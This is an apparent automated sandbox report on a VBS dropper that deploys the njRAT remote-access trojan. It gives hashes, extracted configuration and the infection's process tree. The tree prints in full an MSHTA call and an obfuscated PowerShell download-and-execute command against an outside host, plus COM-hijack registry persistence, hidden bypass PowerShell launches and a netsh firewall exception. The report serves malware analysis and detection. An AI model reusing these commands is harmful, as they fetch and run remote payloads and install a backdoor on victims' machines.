Analysis
-
max time kernel
149s
-
max time network
150s
-
platform
windows10-2004_x64
-
resource
win10v2004-20220721-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20220721-en locale:en-us os:windows10-2004-x64 system
-
submitted
09-08-2022 18:59
Static task
static1
Behavioral task
behavioral1
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
LIYDOERWQPOKERHAVAXOCI.vbs
Resource
win10v2004-20220721-en
General
-
Target
LIYDOERWQPOKERHAVAXOCI.vbs
-
Size
1KB
-
MD5
7fa6c86604b4b5706beac109127af386
-
SHA1
aeac233400b02928f3a025a740bcfd6e2f85cd8a
-
SHA256
04d8d89df7a3ebe9d24b4635b6f4760e81465d672cb9f010e020b336b2d811ec
-
SHA512
e79fe1be4f96e06da8f60e7bb486e854bbf66509c637f08734771cc6a26a8051a281f8e484145252cd2e90d7196175761ad14f4cf00122ae9431a330ba189330
Malware Config
Extracted
https://tradeguru.com.pk/enc.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: MSHTA.EXE, POWERSHELL.exe, POWERSHELL.exe
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2672 4200 MSHTA.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 972 4200 POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1232 4200 POWERSHELL.exe
-
Blocklisted process makes network request 3 IoCs
Processes: MSHTA.EXE, POWERSHELL.exe
flow pid process
12 2672 MSHTA.EXE
15 2672 MSHTA.EXE
20 972 POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description pid process target process
PID 4956 set thread context of 3684 4956 powershell.exe aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes: reg.exe, reg.exe
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid process
972 POWERSHELL.exe
972 POWERSHELL.exe
3500 powershell.exe
3500 powershell.exe
1232 POWERSHELL.exe
1232 POWERSHELL.exe
4956 powershell.exe
4956 powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs" 1⤵
-
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc.txt 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 
'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 6⤵
- Modifies Windows Firewall
Downloads
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1
Filesize
604KB
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat
Filesize
706B
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1
Filesize
3KB
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize
3KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B